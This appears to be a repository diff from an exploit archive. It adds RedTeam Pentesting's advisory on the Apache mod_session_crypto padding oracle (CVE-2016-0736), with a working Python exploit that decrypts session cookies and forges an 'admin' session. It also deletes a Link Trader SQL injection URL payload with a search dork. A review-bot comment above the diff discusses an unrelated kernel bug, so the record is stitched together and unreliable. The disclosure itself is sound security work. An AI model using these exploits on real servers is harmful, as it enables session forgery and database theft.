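Review bot: The trailing `Proof of Concept:` line is kept as unchanged context while the link that follows it lies outside the hunk, yet the new text moves the Source to project-zero issue 926 and describes a different bug (the ipc_port io_references overflow reached through io_service_add_notification_ool, not the IOUserClient asyncWakePort leak of issue 930 it replaces), so please confirm the PoC link below was updated to the issue-926 code — otherwise the record pairs one bug's write-up with another's exploit. None of the visible files.csv hunks touch the 40955 row, so its description may still name the old issue; worth checking in the same commit. The `** fixes **` section could also carry the defender-side reading the text already supports, e.g. `Note: triggering this requires the request to be sent 0xffffffff times over several hours from one process, so sustained call volume against this MIG endpoint is observable, and the fix direction is a saturating reference count as OSObjects already use.`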
@@ -0,0 +1,376 @@ +''' +Advisory: Padding Oracle in Apache mod_session_crypto + +During a penetration test, RedTeam Pentesting discovered a Padding +Oracle vulnerability in mod_session_crypto of the Apache web server. +This vulnerability can be exploited to decrypt the session data and even +encrypt attacker-specified data. + + +Details +======= + +Product: Apache HTTP Server mod_session_crypto +Affected Versions: 2.3 to 2.5 +Fixed Versions: 2.4.25 +Vulnerability Type: Padding Oracle +Security Risk: high +Vendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt +Advisory Status: published +CVE: CVE-2016-0736 +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736 + + +Introduction +============ + +The module mod_session_crypto of the Apache HTTP Server can be used in +conjunction with the modules mod_session and mod_session_cookie to store +session data in an encrypted cookie within the users' browsers. This +avoids server-side session state so that incoming HTTP requests can be +easily distributed amongst a number of application web servers which do +not need to share session state. + + +More Details +============ + +The module mod_session_crypto uses symmetric cryptography to encrypt and +decrypt session data and uses mod_session to store the encrypted data in +a cookie (usually called "session") within the user's browser. The +decrypted session is then made available to the application in an +environment variable (in case of a CGI script) or in a custom HTTP +request header. The application can add a custom HTTP response header +(usually "X-Replace-Session") which instructs the HTTP server to replace +the session's content with the value of the header. 
Detailed +instructions to set up mod_session and mod_session_crypto can be found +in the documentation: +https://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples + +The module mod_session_crypto is configured to use either 3DES or AES +with various key sizes, defaulting to AES256. Encryption is handled by +the function "encrypt_string": + +modules/session/mod_session_crypto.c +------------------------------------------------------------------------ +/** + * Encrypt the string given as per the current config. + * + * Returns APR_SUCCESS if successful. + */ +static apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f, + session_crypto_dir_conf *dconf, const char *in, char **out) +{ +[...] + apr_crypto_key_t *key = NULL; +[...] + const unsigned char *iv = NULL; +[...] + + /* use a uuid as a salt value, and prepend it to our result */ + apr_uuid_get(&salt); + +[...] + + res = apr_crypto_passphrase(&key, &ivSize, passphrase, + strlen(passphrase), + (unsigned char *) (&salt), sizeof(apr_uuid_t), + *cipher, APR_MODE_CBC, 1, 4096, f, r->pool); + +[...] + + res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool); +[...] + res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in, + strlen(in), block); +[...] + res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block); +[...] + + /* prepend the salt and the iv to the result */ + combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t)); + memcpy(combined, &salt, sizeof(apr_uuid_t)); + memcpy(combined + sizeof(apr_uuid_t), iv, ivSize); + memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen); + + /* base64 encode the result */ + base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen + + sizeof(apr_uuid_t) + 1) + * sizeof(char)); +[...] 
+ return res; +} +------------------------------------------------------------------------ + +The source code shows that an encryption key is derived from the +configured password and a randomly chosen salt by calling the function +"apr_crypto_passphrase". This function internally uses PBKDF2 to derive +the key. The data is then encrypted and the salt and IV prepended to the +encrypted data. Before returning to the caller, the result is encoded as +base64. + +This procedure does not guarantee integrity of the ciphertext, so the +Apache module is unable to detect whether a session sent back to the +server has been tampered with. Depending on the application this often +means that attackers are able to exploit a Padding Oracle vulnerability. +This allows decrypting the session and encrypting arbitrary data chosen +by the attacker. + + +Proof of Concept +================ + +The vulnerability can be reproduced as follows. First, the modules +mod_session, mod_session_crypto and mod_session_cookie are enabled and +configured: + +------------------------------------------------------------------------ +Session On +SessionEnv On +SessionCookieName session path=/ +SessionHeader X-Replace-Session +SessionCryptoPassphrase RedTeam +------------------------------------------------------------------------ + +In addition, CGI scripts are enabled for a folder and the following CGI +script is saved as "status.rb" and is made available to clients: + +------------------------------------------------------------------------ +#!/usr/bin/env ruby + +require 'cgi' + +cgi = CGI.new +data = CGI.parse(ENV['HTTP_SESSION']) + +if data.has_key? 
'username' + puts + puts "your username is %s" % data['username'] + exit +end + +puts "X-Replace-Session: username=guest×tamp=" + Time.now.strftime("%s") +puts +puts "not logged in" +------------------------------------------------------------------------ + +Once the CGI script is correctly set up, the command-line HTTP client curl +can be used to access it: + +------------------------------------------------------------------------ +$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb +HTTP/1.1 200 OK +Date: Tue, 19 Jan 2016 13:23:19 GMT +Server: Apache/2.4.10 (Ubuntu) +Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ + l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ +Cache-Control: no-cache +Set-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ + l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/ +Transfer-Encoding: chunked +Content-Type: application/x-ruby + +not logged in +------------------------------------------------------------------------ + +The example shows that a new encrypted cookie with the name "session" is +returned, and the response body contains the text "not logged in". 
+Calling the script again with the cookie just returned reveals that the +username in the session is set to "guest": + +------------------------------------------------------------------------ +$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\ +LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \ +http://127.0.0.1:8080/cgi-bin/status.rb + +your username is guest +------------------------------------------------------------------------ + +Sending a modified cookie ending in "u=" instead of "U=" will invalidate +the padding at the end of the ciphertext, so the session cannot be +decrypted correctly and is therefore not passed to the CGI script, which +returns the text "not logged in" again: + +------------------------------------------------------------------------ +$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\ +LQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \ +http://127.0.0.1:8080/cgi-bin/status.rb + +not logged in +------------------------------------------------------------------------ + +This verifies the existence of the Padding Oracle vulnerability. The +Python library[1] python-paddingoracle was then used to implement +decrypting the session by exploiting the Padding Oracle vulnerability. 
+
+exploit.py
+------------------------------------------------------------------------
+'''
+
+from paddingoracle import BadPaddingException, PaddingOracle
+from base64 import b64encode, b64decode
+import requests
+
+class PadBuster(PaddingOracle):
+ def __init__(self, valid_cookie, **kwargs):
+ super(PadBuster, self).__init__(**kwargs)
+ self.wait = kwargs.get('wait', 2.0)
+ self.valid_cookie = valid_cookie
+
+ def oracle(self, data, **kwargs):
+ v = b64encode(self.valid_cookie+data)
+
+ response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',
+ cookies=dict(session=v), stream=False, timeout=5, verify=False)
+
+ if 'username' in response.content:
+ logging.debug('No padding exception raised on %r', v)
+ return
+
+ raise BadPaddingException
+
+if __name__ == '__main__':
+ import logging
+ import sys
+
+ if not sys.argv[2:]:
+ print 'Usage: [encrypt|decrypt] '
+ sys.exit(1)
+
+ logging.basicConfig(level=logging.WARN)
+ mode = sys.argv[1]
+ session = b64decode(sys.argv[2])
+ padbuster = PadBuster(session)
+
+ if mode == "decrypt":
+ cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])
+ print('Decrypted session:\n%r' % cookie)
+ elif mode == "encrypt":
+ key = session[0:16]
+ plaintext = sys.argv[3]
+
+ s = padbuster.encrypt(plaintext, block_size=16)
+
+ data = b64encode(key+s[0:len(s)-16])
+ print('Encrypted session:\n%s' % data)
+ else:
+ print "invalid mode"
+ sys.exit(1)
+
+'''
+------------------------------------------------------------------------
+
+This Python script can then be used to decrypt the session:
+
+------------------------------------------------------------------------
+$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
+Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=
+Decrypted session:
+b'username=guest&timestamp=1453282205\r\r\r\r\r\r\r\r\r\r\r\r\r'
+
+real 6m43.088s
+user 0m15.464s
+sys 0m0.976s
+------------------------------------------------------------------------
+
+In this sample application, the username and a timestamp are included in
+the session data. The Python script can also be used to encrypt a new
+session containing the username "admin":
+
+------------------------------------------------------------------------
+$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
+Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
+RU= username=admin
+
+Encrypted session:
+sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY
+
+real3m38.002s
+users0m8.536s
+sys0m0.512s
+
+------------------------------------------------------------------------
+
+Sending this newly encrypted session to the server shows that the
+username is now "admin":
+
+------------------------------------------------------------------------
+$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
+zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb
+
+your username is admin
+------------------------------------------------------------------------
+
+
+Workaround
+==========
+
+Use a different means to store the session, e.g. in a database by using
+mod_session_dbd.
+
+
+Fix
+===
+
+Update to Apache HTTP version 2.4.25 (see [2]).
+
+
+Security Risk
+=============
+
+Applications which use mod_session_crypto usually store sensitive values
+in the session and rely on an attacker's inability to decrypt or modify
+the session. Successful exploitation of the Padding Oracle vulnerability
+subverts this mechanism and allows to construct sessions with arbitrary
+attacker-specified content. Depending on the application this may
+completely subvert the application's security. Therefore, this
+vulnerability poses a high risk.
+
+
+Timeline
+========
+
+2016-01-11 Vulnerability identified
+2016-01-12 Customer approved disclosure to vendor
+2016-01-12 CVE number requested
+2016-01-20 Vendor notified
+2016-01-22 Vendor confirmed the vulnerability
+2016-02-03 Vendor provided patch
+2016-02-04 Apache Security Team assigned CVE number
+2016-03-03 Requested status update from vendor, no response
+2016-05-02 Requested status update from vendor, no response
+2016-07-14 Requested status update and roadmap from vendor
+2016-07-21 Vendor confirms working on a new released and inquired whether the
+ patch fixes the vulnerability
+2016-07-22 RedTeam confirms
+2016-08-24 Requested status update from vendor
+2016-08-29 Vendor states that there is no concrete timeline
+2016-12-05 Vendor announces a release
+2016-12-20 Vendor released fixed version
+2016-12-23 Advisory released
+
+
+References
+==========
+
+[1] https://github.com/mwielgoszewski/python-paddingoracle
+[2] http://httpd.apache.org/security/vulnerabilities_24.html
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+'''
\ No newline at end of file
diff --git a/platforms/php/webapps/10834.txt b/platforms/php/webapps/10834.txt
deleted file mode 100755
index 05b9a42d4..000000000
--- a/platforms/php/webapps/10834.txt
+++ /dev/null
@@ -1,28 +0,0 @@
-|___________________________________________________|
-|
-| Link Trader (lnkid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-| Author: Hussin X
-|
-| Home : www.iq-ty.com<http://www.iq-ty.com>
-|
-| email: darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-| |
-|
-| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
-|
-| DorK : inurl:ratelink.php?lnkid=
-|___________________________________________________|
-
-Exploit:
-
-
-
-www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
-